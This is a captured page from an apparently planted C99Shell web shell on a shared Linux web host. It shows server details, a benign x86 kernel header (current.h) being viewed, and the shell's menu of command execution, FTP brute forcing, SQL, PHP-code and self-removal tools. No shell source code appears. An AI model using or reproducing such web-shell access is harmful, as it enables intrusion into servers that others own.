!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.3.27 

uname -a: Linux pdx1-shared-a4-04 6.6.104-grsec-jammy+ #3 SMP Tue Sep 16 00:28:11 UTC 2025 x86_64 

uid=6659440(dh_z2jmpm) gid=2086089(pg10499364) groups=2086089(pg10499364)  

Safe-mode: OFF (not secure)

/usr/src/linux-headers-6.6.116-grsec-jammy-dirty/arch/x86/include/asm/   drwxr-xr-x
Free 709.9 GB of 879.6 GB (80.71%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     current.h (1.27 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/* SPDX-License-Identifier: GPL-2.0 */
#ifndef _ASM_X86_CURRENT_H
#define _ASM_X86_CURRENT_H

#include <linux/compiler.h>

#ifndef __ASSEMBLY__

#include <linux/cache.h>
#include <asm/percpu.h>

struct task_struct;

struct pcpu_hot {
    union {
        struct {
            struct task_struct    *current_task;
            int            preempt_count;
#ifdef CONFIG_SMP
            unsigned int        cpu_number;
#endif
#ifdef CONFIG_CALL_DEPTH_TRACKING
            u64            call_depth;
#endif
            unsigned long        top_of_stack;
            void            *hardirq_stack_ptr;
            void            *hardirq_stack_ptr_lowmem;
            u16            softirq_pending;
#ifdef CONFIG_X86_64
            bool            hardirq_stack_inuse;
#else
            void            *softirq_stack_ptr;
#endif
        };
        u8    pad[64];
    };
};
static_assert(sizeof(struct pcpu_hot) == 64);

DECLARE_PER_CPU_ALIGNED(struct pcpu_hot, pcpu_hot);

static __always_inline struct task_struct *get_current(void)
{
    return this_cpu_read_stable(pcpu_hot.current_task);
}

#define current get_current()

#else /* !__ASSEMBLY__ */

#define GET_CURRENT(reg) \
    _ASM_MOV PER_CPU_VAR(pcpu_hot + X86_current_task),reg

#ifdef CONFIG_DEBUG_POISON_CURRENT_TASK
.macro DECODE_TSK_PTR tsk:req
    shlq    $1, \tsk
.endm
.macro ENCODE_TSK_PTR tsk:req
    shrq    $1, \tsk
.endm
#endif

#endif /* __ASSEMBLY__ */

#define X86_GPF_POISONED_CURRENT_TASK    _BITUL(31)

#endif /* _ASM_X86_CURRENT_H */

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0655 ]--